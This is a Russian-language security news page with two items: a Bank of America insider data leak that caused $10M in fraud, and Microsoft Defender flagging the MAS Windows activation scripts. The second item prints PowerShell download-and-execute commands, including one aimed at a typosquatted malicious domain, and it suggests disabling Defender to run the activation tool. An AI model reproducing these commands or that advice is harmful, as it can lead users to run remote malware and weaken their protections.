Клиенты Bank of America потеряли $10 млн из-за крупной утечки данных

Клиенты Bank of America потеряли $10 млн из-за крупной утечки данных

Американский финансовый гигант Bank of America начал оповещать своих клиентов об утечке личных данных и мошенничестве с этими данными, через почти год после обнаружения мошеннической схемы.



 Как сообщает издание Bankinfosecurity.com, один из сотрудников Bank of America, имевший доступ к конфиденциальной информации клиентов банка, скопировал эти данные и передал их злоумышленникам. Скомпрометированные данные включали в себя полные имена клиентов, их адреса, номера социального страхования, телефонные номера, номера банковских счетов, водительских прав, адреса электронной почты, даты рождения и даже PIN-коды и информацию о состоянии счетов, передает CNews

С помощью похищенных данных злоумышленники получали незаконный доступ к аккаунтам электронной почты клиентов Bank of America и телефонным номерам, открывая на их имя новые счета в банке и выписывая чеки на подставных лиц для вывода похищенных средств.

Всего с помощью данной схемы удалось похитить более $10 млн. Из-за действий мошенников пострадали около 300 клиентов Bank of America в Калифорнии и других западных штатах.

Впервые о мошенничестве банк узнал еще в прошлом году, сразу же уведомив об этом представителей правоохранительных органов. В феврале текущего года полиция арестовала 95 подозреваемых в участии в данной мошеннической схеме. Среди них и сотрудник Bank of America.

Несмотря на то, что об утечке известно уже достаточно давно, банк только недавно начал оповещать пострадавших клиентов, объясняя свои действия тем, что ранее велось расследование данного инцидента.

«Банковская сфера плодовита на умышленных инсайдеров по понятным причинам: фактически все сотрудники банков работают с конфиденциальными данными о клиентах и их деньгах, что неизбежно порождает искушение хорошо на них заработать. Поэтому борьба с внутренними угрозами в финансовых организациях, как ни в каких других, должна быть комплексной и тщательной, — считает директор по маркетингу компании SecurIT Александр Ковалев. — Во-первых, это работа с сотрудниками: анализ психологических склонностей, исследование трудового прошлого кандидатов, отслеживание поведения сотрудников в рабочем процессе. Во-вторых, технические средства защиты от утечек должны контролировать перемещения документов на всем протяжении цикла работы с ними сотрудников: начиная от продуманного разграничения доступа к информации разной степени конфиденциальности, безопасного использования устройств, покидающих пределы предприятия, и заканчивая максимально возможным контролем каналов сетевых коммуникаций».

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru